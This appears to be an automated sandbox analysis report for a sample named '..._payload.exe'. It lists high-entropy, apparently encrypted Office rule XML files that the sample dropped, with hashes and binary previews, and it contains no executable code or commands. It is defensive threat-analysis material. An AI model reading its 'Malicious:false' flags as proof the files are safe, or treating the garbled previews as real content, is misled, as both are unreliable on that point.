                                                                                                                          Preview:<?xml."?u.C........GY. G..h...8XQ.O....".....|j..Zt........Y....M..9V.~...B....I...........i.*..1.$p.j.......|..]..S.a...E.=..%....).p..A?X...0..d.H&.).?-...3.....[..7.m3^T..q.....c(_.....=.QfDm...n...k(.!.....g..#k.5t<.....p(..3.P..LC..,..n......9V...q./....{e..G..od..=(w}zfU...k.#......^ .;O%.Q.....(.;t..Qv.\.Uu8...H.d..8.....#d..J....[...7...}?...e......@n._xp4.h........|..O.I?....?\.>..o..?Y.....i..../4..=k.....+...\.. .$t..;..2j/....k.O..7Y....r..k...B./...c..K.!..`#S_.....`....e...K|o..'.x2..<....=.jz.b+..f.p>....t.z. r.U4...%...T....\!..=....V..../:R...DG.a?$v...>Y.T...|...$..tx.............fz....3 E...u.c..W.:^.......6U....^...1m55/....d2C[....b...d....5..U).+.r....!..@..}...m.G%.......Qn....}.qR.6~.f....gJ...7Y....S.i..y|.d..D.."z0.}.........T}Dp...5.X....>d.2..Kl..Z.7.y.BVF..........v.&.](...l......0:..3...(z...},..<E2#...z.....3.pi......F........(O..NHj.......?....e..\&....4.).@........M.t.Q.g...`7..r..d..g..Nf

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2924
                                                                                                                          Entropy (8bit):7.92023519172564
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+eh0i6B7v5g9V+LOI4p3DcGJ1rxl+dFWjS20IL+9B8iBBpfpwWmKBZYVgAAgD:j7h2YLOtBudh20IEBhD3R2t
                                                                                                                          MD5:9C87C43E14D545F43A729418FD497ADB
                                                                                                                          SHA1:9F6F404E0198E0FDC8950681DD86E5C191F74CB3
                                                                                                                          SHA-256:1F9615E62240C554FDE0D3C3CA0BA289F79CD95254B72A5F3DADD1A720EF51ED
                                                                                                                          SHA-512:D3F6CE5ECF39352ED6F76D3EF331912B8F0C7665359E143B05701B23D2700A8EF081972B817BE116EA62B8A55EABAFEBA948641ED57F6BB4C46E5147D02D6706
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlFu*w2+F."....ze.-..........8.[*.K.B...q.4... 8q.Ff.-T.^...}:....D+v..-.p"...r!R72.....(..3.@+....f..V.....e@..9......*...L.&J..rB.Ih...c.}.:......./......~e.:.x.BuE.....hp.WzV>{..\.7...."K|..J.y.Tpdg.y.!....(.V.c...w.........."c...V....An......8...O.{.....%-M)....(.{,.o...C...u]..y...!..+...U.....y.U..T'......2.0.7./.7).R......A....a......`j.D.).f.....#S1...SF..Z.g...#K.R.5F?2...E...7...Vp}l..3.......cV.wR..j...rS...].~.{.rI..u.s.&0...cF....z......G...v( XS..V..bLd...d....5.aS.H.K.....3.."...z..].c~..j..c16...D..r......W.X.P}\....].p>.\..k.i...5;..>G.4...L[..".MXN.M. .#....^..Xpbf.O.\.f..h.!.:..K.2..2...P9.5....... .Um..LZ4T....5a.....]*.~N.s?..W.8.{"r.o[....;.D..qH...$._...W(...l+.b....G\n.D.5.U'.%......T.s..Q..d#M....1t...O..Kl.8f......L....l4.X..ZB0..lD..\o6l..k......38E%.........Z.w.........V'0.z^u.&@...c.M@.n8Fl.&%{....c...R...J.{.(;..[0../$...G....]....h2..+{.&c=.......%@.~.1.b.7.....>.....}x...7...@....;....z...'.0UC.>...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v8.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2461
                                                                                                                          Entropy (8bit):7.918186598336107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Z7zGR49arHjDvl5c3/HVLNjtCRoaKqor0sHGUpSKzDb6Ug/dBZlFiBoUD:Z7zGROazjDN5c3/H5jqor5SGKFfiB7
                                                                                                                          MD5:522AB7598E4B6BC29FCC83C17481FA75
                                                                                                                          SHA1:274F10CFCD51315FD70C5A2007CD64117B799AF8
                                                                                                                          SHA-256:2B3CC7409D8B0C743673C755F19EA35C43947788CFA98875FD9885C91DFFE33D
                                                                                                                          SHA-512:E9F3F23293CD27E79CC40F3E6303A3EB2D97B9BD38C6263EAE2526AA751EFBBA1D367EF84F8DE81C57B6227A0EA8810DA7545CB6E0094E0FE4A7CDFCBCDCC728
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.r..{..0.D..S..[...9.5.......d.^.@`.H.r@....J..uK.t.(.nY.o..;.G.uQ. ZUg0:W+g...u.E;..dO..E..P..-.].v.....a.o(uL....8R.2...(03.]..C.P..~d.....N9..}..C._A.b9...B......*-..wP..=%...@.[Dw.B..-&.Si.m...~...\....j,v.I.(.....Ar'2I.m..A.....DB.O..r..3...K;.|....k=i.Y..V.eD....h..p....L.CF..BW...\...s5...Z....).$F.{[..LBFegS.....C*...hD<.........M.>%....f.8.^"...'..t...}$J.G..=.kp_.).;...um&...4...w4..^{........Y..D.w.B....gcOn....j.>.K.v.........c....1...g.f.....-.B...EE{.@...2.t{..W.r~h._.`>Y....U..6..+P.@]7C.2./.hw.eB.%]..b~.E].W..C'b.......I.b%....Bx.$. ..o.C........V\L~nq...Y...)..(.`..{.+.....Y..6.....F(.O.!?.....+.a.*X/.._.P@T.a.W5gmV...`.......VsB...,Y...l..hx..5..e...f.. .....lH..6.s}.,d..w.(....3 HI..J..2_Q.`.Q...H.ec..G&.w.T`R........1.T..Z..n...[m.y...-.W.`*....B,J.x.?.J{. =}....+~.m:.Z6..xn.%..+y....+...d|.u.Z@....._...s.J......q...]....,.2.?....S.LPS..p............m...2..........'"..3..m..|.f. ....-..C<emE.4eT..=...+.Hu..@.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):758
                                                                                                                          Entropy (8bit):7.688617652010015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:zLCVrC4018AUQ6u/4JVvHeHNyr04p0wohHkassCyNEqOl9aZsATUEEaX9vLq5bTX:PCVrm6m4JVvHXT0woPst90se1tv+bD
                                                                                                                          MD5:09C8D323BEC42869161AB0C88A4A018E
                                                                                                                          SHA1:EEABCF9C883B689AC64FDB81233B9F34802156B6
                                                                                                                          SHA-256:856029C02EE28A8C9922918B2BB0D649E9B829A0B13C013F387310643627012E
                                                                                                                          SHA-512:3A47EB2B2F54D6D500970E62184631E3FA690BF359E837BBE1451DBBFEF87BE2949EBD775865F3126E1DCA2199F7208A309C9530B338B0873905B8DBF79F2DD6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.m.{...._.|...0 t.....G.....Z...;...h......"b...:..+e..h...*.....].......u.....@v.!.*..IW.g..H...eX......x.F..W..e.r...).~.~F.<...;...;.6.1..a...f..5t6.O.]+..u?.......k..(.rg...?..(?.I^|.CZ.. !...>...XO..d._.B..f...si0.;...9...6Qm.....!.J..3wV.....tX.;4@.o..Q.i.....-G)..c[...C7.`@.[[..*.q....M4...y!{....fr.... :.\..l;.X....cu..=.0.?O......s...vf.mp..V'j...._]S...sd...'.+2#...g....7._...v.-....}Y...j.C...?...`j+...s..s.....9..rF....:"......m..zj..v.-^.f.l.......gwo.bf...\/....4&p...fI..A...ou.7..K".....-c......Q.#.f....w.R?...];M...@Iax..l......Is..)..r.=B...t.=...[Y.h.6..f....^{hQ..D..5.x..M/.`.O.5..2i..T/.TxIM.3..........0...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120605v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1210
                                                                                                                          Entropy (8bit):7.823635502396898
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1KpIHtgXnao39uI8mInbIcscB6GmhMl/Z1zDMwTnGg6XmfQFfAXZ52WWHEswbD:cIyXaoz8tnLB6GmGB49XmfQGsHRqD
                                                                                                                          MD5:4B1F3A43BE8BB0ABAB3D2E16B31D8A04
                                                                                                                          SHA1:531D53B601559FCCF3937A55F9CCAF6B0FA68570
                                                                                                                          SHA-256:20FF7D304D4466204A47AB129292992EE12F6FDA076F01336C9394F814561A1A
                                                                                                                          SHA-512:4EB3A840AF0D5896B9F4A616BCE4954BEB24F3E4CE6A27C3B320546D8BA24BA33FB8784F53B5716EAAE30196F3F8F12402DF0DF7FA88CB62F641ED8865270556
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlz.aIP..hW T$f,.....K.....F..H$'.....|*M.D.aln]...Y..@o.H.8..>w......\0. ..aO...P.X....G;#>q...*.......V\.9.0Z..U7....I"........ck..P....<@...Ti[J. .2yv. ..'=...$.sC'.s|...z.G-.!.......keEB..#..[..>.Ku.*.n .<*.3/.....qf...og.U.0.d.j..z..@.:.^...koN.).j]Z!J)F...h4n...$E;.>\!..>5y_Os....H../.!...u4.HEC.c..+.F.B.?.jQ.k;qls...[.:..N........U1&....3.guE.PM...m#n`.....L.x.h........7...5....@...1.?.....N.B~.iw......K.=.l..C.A^..@. .._.5.3...\....E.f.{z0.2..aUZ.A...f.LA...1..J.g.$=8j4..~..$^R..<:Y.X..,.q.eV.J..;s.:'..].5...h....8....k.....<..9....p=(...O..#...@.<...S..\z`%~p..$B...&.....\4uG.I."....N.0.O.q.c4..c.O(=..4..z....\.m.....jFl..@..b-T..K`.B.tj.j........w..#....../.K9w...X....V(...q}.R...L.:E137).{9........spR....-..8e..._.1.F.......^6...W...:w.sS.(.8..b=..w..J..3..3..{C.....X.a..`-.#2_i.w......^...?q.5...(..Y|G...NTH...e.S....c..w..L....x.=?.P...G;.c......N.~..K.n.....xQ.u..,./.C..^....g#F7B(.0......l5n.(....|..."......E.~

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120607v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):537
                                                                                                                          Entropy (8bit):7.5916292575920075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LTz946Jp8NpeWN/GXD/A2fL2aq5bTcii9a:L946Jp8l1GXDI42fbD
                                                                                                                          MD5:C72501663CCB973422D78576AC9149B9
                                                                                                                          SHA1:CD00DBD09CE390C6B479F8EE1DA0ACE1ADA9457B
                                                                                                                          SHA-256:F03CC3938C41B8DB3AA99ED9D3F349D0120ADDEB833A768E09DAB2A3DEE9D8B3
                                                                                                                          SHA-512:7D65B8A432FD654B2C914C3E370DCE973707AA945AA46E8DC7B62780AE41DD3377F974BA488663C48E4DE53BFCE52063B872FC36549027079AD764D537F3B1EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.(..0.+e..B.-..."..'....$%.,..9q..{..P....z.....jU{aG....6tV..J.A.P.D...?.y.`.#....TZf.n^.....M[..Z"=.j:.p..C...S.+qL.M.......#,.....u...q.*.2...q.R.B....I.....(.."../......b......fD_.6..h .....*......~.]v...P.o...{..E.$....h....L....;..Lp.....=.....g....H.......7{..z.0...A.q..J.].(..e[...Z..8..!...i......@...r......8Q...!P....J..A9E.d....v..^.7m.a)...I..u..y....=...M..R7.....4....N0iq"....w.e.......6'....,...0bs.,...h=j.&k.EphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120608v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2493
                                                                                                                          Entropy (8bit):7.915903536109963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:O8Q2p+P6SClusdBOekNAZS7cCuAnL/nbe4bWHzTm1ffjaAZ/0ks59hVjnj5Mh1CD:O8QzDa6epZS7cpqn6zHzOjaAp0ks59/7
                                                                                                                          MD5:6982AF8BDE78B47D8368F51E93326F71
                                                                                                                          SHA1:9C9E5C2F58E5C6E6C08C2AB21A5D2EC919C70A85
                                                                                                                          SHA-256:45034A5A01F35045C5FC96BCA635E2EB59823D6022C6737B9EA2C9AC2E11C27B
                                                                                                                          SHA-512:15FB1FC40A7566D58115885F238B9D9D3765940F99EA17DD4E20B522FF14E74A581A0FE7496B55ACDE6F20477E57C028905D7408769EAAD3D8D1D6A6D4D21196
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.]R....).........0+.'.?....Q..Q.6.!S2.V.z.T.$-7$.I.../...9.....z.'.R#..6......C.-A.E.C.3A...I1.^YP..+.W.I>...i...l..@...`.....Q..o4.^.............+#"b-.%.-..|.....J.@IU.....c^...Im..~...`..q...V.....!a..#...n77-..p.u.?....;.Pb7..]..a..wA...f.@..j.?O..6f....*.c...............R}V.|...-....b....&....r..3.m.2(...............L,..N.Z.M(.'........y+a..Q..B'.8...f..C[.V.....]...u{..e.1..K$.*dJ.@..H...D0.S..dDBRl.].."U.|.\j\....N.^N)..0.._h...;...*.;K.S._...v.3.........*......O...E.KU.4.M.*.%.P..y....hP #L..J..O5W"..^.7. ......[.F}..y...jE..@....{...7.cWa."......5.6GAY}w.d...'O.X5.K....r..%...%%.*x\..H.*A.w....LMT..|Q.6o.....P.H....(zk...R..c..N....;.^....b....(...o.!.-...h.+...g.u...V...D...%.......j.+...,.O.*5. n?.S...f.@.;...S.>.D..fH. ..%.U...B...6@{L........R)..F0].F..).....@.+!....RP.#..S.H...9C.I.?:.<.~.^[.N..'P.z..t...3.qc...L$.N{.t..i=i..........>q".9..4:..BZ......#........<..R...J.s....sf. .g..E.7..=.k.K...k..3..61.LKE.'..Fhz"F.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120609v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):741
                                                                                                                          Entropy (8bit):7.7181854997525
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:i7Fhda/KnzlUhIUTVQiSyYx4i898cOJJNiAqQZuSkWBQ0Y3+xUo3/Ph8hq5bTciD:iBleIUTVQiSyYx4iRcXEoWBQf4/9bD
                                                                                                                          MD5:16D6C9F20F2385D93DCE9A2F9ABADEA4
                                                                                                                          SHA1:911201DA1634C98E3DF35FB404F0557C698EF30C
                                                                                                                          SHA-256:4039AB88F1648DEC18E4DA4B93EDD085F9D8E51C62CCDE540011176FEBC4A8EA
                                                                                                                          SHA-512:9FA5AD7253827C0C45EF0C80C81F6330FC151E5475C64645235E4D594C1DFED5CB8034297A339B0CEAC1E0BC035397DEF17DA2A6470206E116907368278786BE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.t..Qi&U.~z......".w...EsV~._.Y..%q.%.....qO....e.....7.&0...Tq..pxR..T E..q.....S.*....%C1.K.We".1.>.0...G .?..V..;,L37/Z>N.v#...E......![)...*vO.............r=S..$.F.^.@...vi.=..cY.)..K..Q..t.l.m.E.G...?.=r,......x..@C......`r.1[.k.L..k.....k........P..J.Uzqk..P..#.TVx..T=]..:6...^.v..c....sG..H......05......l...M..B]a........x?.1*...L?...Q.^..5^.....~.JY.../..:.O....Cj.....'.7$..1.{..Kn....5..X.%...c-....u.=...r.<w..)..x...'...........rH..].<@...c.......;...S.....}.\w...#5lN+/..v.u."D..sHU.|.. .....6...F.B.f....Q9..#..&..E....=....l<-.......\.......6.\~.....f..CDU:._R.O.......e.Iu.].A.XV.B4A.w.=.U. .t9..^`m..6p.".K.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120610v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):807
                                                                                                                          Entropy (8bit):7.7152465057024555
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TNKbTGW5jMWqQoBT2HXriSDEBhvkH0pPniNGbD:Ubymj/oJgmSDEBhvk8niNUD
                                                                                                                          MD5:1F50D2AD9620426BC78268440D16EB7E
                                                                                                                          SHA1:299957296E7E179A7F86F223572BCCFA856D75CF
                                                                                                                          SHA-256:8FF89638025AA4C94E48AE823C21A9B4B47EE5321F2C29E75DBEE7889C4FF172
                                                                                                                          SHA-512:7D56E7B137488EDED617F6DDF8774D9AEE85919583B385B9BF51AD05252AE14CEF851E0959C12CE83FCBD41430E74552EF58C9C699A854B0CB6D95456EF26A96
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml2=izUX..Ri..[.^}.).....e/=X.i/.....!b...g9*..\.b...1.}-.......Z/.v..>-.2.:.1..9.h.&r6..m.....*.L...)#.;~...N.<....2...MM<Aq~....U..}..p'..m....+{...f.t8v...\gL..e..'l...(.Bf#rRt..... ..L.-g.......d."..W...#.T&..Ne..'7...~..SNm....e..%.....|c...`I.2.Q......F.52...dz...W..0....ydKF.....<l...`.a..8s..../V...&...G....K...V..\..o.jJHf7i.....;.*..%....I...j.9.QpXD.....^....%..M..2=..o...!..^.Z..:~. L.'...O......L&Z..>.".0x..S...s.=Gd.U..b.g.....j9...e<.u.'.Xj.),.>.3.X..6E..$.D.BY......5....0.._.+.L!..frM...-i7.Em...m[5.aE.V9....+j"...8.`.\q.d..dq.VcX._4..H./..M5...yor.~k.1.w.h|............ex.q.r$k..G..{...z....|..E1.^1x.6.QX.[....7..c6.ks../...O}...w. @.rr/..N.J?Bg..JMW.|!.h&..v&L..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120611v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):748
                                                                                                                          Entropy (8bit):7.69417924312118
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:q8Sv9gIeoy/J5MP8mjofHeNgW8hoVLhUH6VSiVW9ZF/tkXB7yPNl3b1JVsQiLq53:q8Slleoy/TMP8rUgW8uVLJUiU9ZF/tkA
                                                                                                                          MD5:B9055D08448DF9E834C020716DB0EA5B
                                                                                                                          SHA1:BC4D5D4AFC1079396D755EAE0980FA95B8F9E34A
                                                                                                                          SHA-256:E0BE987642D4D3DB65B72FA5AE052379A440CA97BC9914A5AAA21D6C40BE38C7
                                                                                                                          SHA-512:4C69AC44401C218D229A8653ACD1B7419DE7074ABAC65A9872ED02BC18BCFA01F277833179E187D36F953786623773005B64B170C94396BC4EC3460558C35914
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....Rq.1..2..x...t.w...Va9...............u.QH1#a.Q{...%...x.t.`.O.......V..._.om....p....4..`....'E............P.MWT.0RP...w}X.j.:...o.?@.`....E..u.m...O.KYL....,zh..2.....s............/:....%b.....5|t..t....P.4..(E..6z......td=..\Va...$W!5W..J.@...?8.....e7{.{.8x..x.8U.Hyn.c...G........{M......._...C.`o.....,mw.#...2}...........B..fFs.....t..5...s>....Ct@.Z...@:G.t:(.l..{)J..-..Q&oDI.f..C...../.......H-L.c..&w.....%.:.E....V7..T.ly.+.F..._ .(.7J.W.......%..$...... ..E.b..F.1.wzK?.<...........,f...D..4/t..'oKN..=,.F.jT\Z.....C.....O.x-....T.&.\<.?.#...*8A.tR..t;.%..!`.b...P...8.......7a.2...|Ji>H............D..6.0P...............phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120612v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):804
                                                                                                                          Entropy (8bit):7.731689982725013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SuZB1lgumZlZKGF/ofz1gMssnYfIlswbD:bN3mZGUMmIiqD
                                                                                                                          MD5:D922BD32325372894800CBBE421C1161
                                                                                                                          SHA1:2B2823052118C1AE5BD3D9F92EDFA1A46FC0B9DB
                                                                                                                          SHA-256:779C6EA95BA906554C71F729102E9C649F05F0D1734986689846638F6BA814E0
                                                                                                                          SHA-512:3AED541163A0C1F1E906F0F8B8B2551EC38E96288D99EDB7E3DAE3E90776935DC4E758C02F33BDCACD01436CA49062999B435E9E8011622349A0D31C8AF4986C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml1.T9.W..G.....{.6R.bz....Y.>.e.b....j&^0..(...u.'.c+..O.z...h:1...e7.....eUh..n.....Pc.T.a#..Hx.Ry....\B...$J}.e.Ub6P.Cg...'k.. .?..."t..)8...=.....y[.^.?.G..A.r.........H..P...3x...../.;...xB..m.......F.........}..|....3..)..,O<j.....i.a..E....uN..q.r.'...4.?**...BH...F@=.....E.j.B...X4v.....e[...s.M....'2...z.l(..lw.2X)..,....gk.mf%....|....V.....P.|7XV.~h...Y.,N..W.....I......7..M....I..........[.@.........5..}4....{...(?..{.Q|I./.....j.....2.Q.hx32.b.7.....>.....[.s..ILA.]C...w.+...#.ad...[q........L....0]TH~n...<.....T$..."...g.N..@.7.=.._..-.r...3P_.d...W#....|.j..2.#.6...W.J..L.Bho.0..R...d.vE.....t.J.Y.Y..{.=Xu....i....k......C...k.h5{Z.....9.Zyy7AY.....{.]H{.4...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120613v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):965
                                                                                                                          Entropy (8bit):7.790313364834823
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:8B8OovJhseBNMpEzAJzpa5jjah111+x0BbD:jOovEUOzkkj1+x0RD
                                                                                                                          MD5:82E1029FBFA53F3270DA0C33A6648647
                                                                                                                          SHA1:955452DBD3906B2D8F4661E6775FF0576035E935
                                                                                                                          SHA-256:67344B3DC0E93C7EFAD59AED30C8F9E823E165E54A171C28819A6794198C02B1
                                                                                                                          SHA-512:A0AB4C84A0D850FDFDB579D6317C504A064800570054C4B3D77D1F0F320E49F4BFA46C5BA3C7BDFC2E12632154EA36E731F926434184361F5F63AF3A66202FCD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlZ...7}.$..L....T.)dF4.....n....O.....7qK"8.._...@D.E.fX.5.-M.`.z...........0..qF.H.Z..g=..[2...(m...S....MK.\..G'3.qWCV.y~.......k....._.....MA....P.9.u..MSYj.X.st..n.....v.^..(.........uBK...l.Iu,...._..(f.z.Q.&........|.m.\...Gf'..n_.......Cr.w..<).:...._E*0P.S....>.{.x..T=Y0.j>.:..i.Z...9K./.m._X5I.sM..3.]...hi..hj..n.F....c.Zn...=C..5e..`P.....Y.K....N....&'....+8p.._.B......"uIy...&G.Z:w...m..}....=...5.XTY..G...../)..2...s/.)..v.1.!..o..)......>....k.>.(..VUg.O.....[U._J.%..x........R........^.k...|....U,...x.......-`...e...[..-.?...UL*.C]_.......y.y......./..h..I..@...."F..<...w..p.4..3.H..#T.EoS...1:..JYV..V:..v..,......~....{}f.v.(.....w..60.q.(.T.5....!.p.F..p..E.H..M....M.l..#.a.4DKN....G.[4J2a.B..9...p.D.0.MyYgk.2.-k..2....7.|.N}0.C.o.>....]D..........B#G~.].. .y...Y....7a.oh.|.....U.t ......XP...j.3..0.$ZphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120614v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):800
                                                                                                                          Entropy (8bit):7.688254220451703
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:i2EDK2yIU0o3GRP833xJheKiMaFuHFw0J7tbD:/Jn48leKAMlw0JND
                                                                                                                          MD5:2BC9ED4A6FEB1D7D6D1AFE07F188DDBD
                                                                                                                          SHA1:6EFDC14067505CA4BC4C0203438D17817740E29D
                                                                                                                          SHA-256:AD3F9A68E4ADAA9ED93C798F620C19F57E94FD6ECBF0F76B21161AC3B6DC2814
                                                                                                                          SHA-512:FBFC21DEFD5306F37DBD8225B1E57939FDDE4678A6C0FD985166747ED89F0401CBA1942886B998C6FF33373681AF081BE9D9FA94212C716716A4262465F178BD
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlw.|....]..]D.#o.n]&N.#.8}..../P.E"...tT.s..-g...R.a....0.B.Y.<.......o....B0.[...DL..69p..&n.b..J.i..G...|?.]\S.$....~.c.IP..0...P."E.(.U.....!B..K....=6.- .u.V6..@..Ez.-...R3.R....gCF1np....t.f^DS.[x.{...G...*.."4U..A...n.....$.lNoS..9..X/..$?..Q.....,E..@.j.0..y.b.Z{..1.2.V..n!2.%P.)........d...v.d....9X..\.G.`4.....Q...2.y.92bwz:N. `?....`:..<..6.#..9X........Vl_c..........av.[...A.'._..BLU....F...2q...E.is.#Q.'..n-....6..QU`.-.v...ve.m.G....i.....@d.#s.M'...2%....y..\..).R..V...."...(...`dV@^.?...}....U0..n.....R8j..A.....Jq.f\YK.."v....l.bT.B....E.Ik.o..7V...No.dWj.3...I...q._.1...L..5.e..A.?..i..*R.......g.)..`G[R.MBxn.y......i....R.v.D.M..U;.*.*z.._.......5.h..'.......<phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120615v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):740
                                                                                                                          Entropy (8bit):7.717258582251756
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:lYkPO+d/sLfzNfdKhCnhmrT6XEUpfdHbWUSjRABfi0NxEA17D3zq5bTcii9a:GSO+sDjKhSoTuJfdHbkNAB6A1XGbD
                                                                                                                          MD5:0C35C51CEDB9D7443AE29BB44B6F7BBF
                                                                                                                          SHA1:F0B05965A2EE2AA428C1CFEF1FD7011ED0BF3533
                                                                                                                          SHA-256:B0560FB3CA09E21E87E80B2F86FA0AD3163E08E9371B227DEA26DF1F771558E0
                                                                                                                          SHA-512:EE69992057A4B13A377ECE5B63CE35739D9D6F034D54D32065ABADA8B78ED47A5A9C051D5FD34D7987B68BEC2E8289538A3E6C23B7022C66361EDBBA6CE905FE
                                                                                                                          Malicious:false
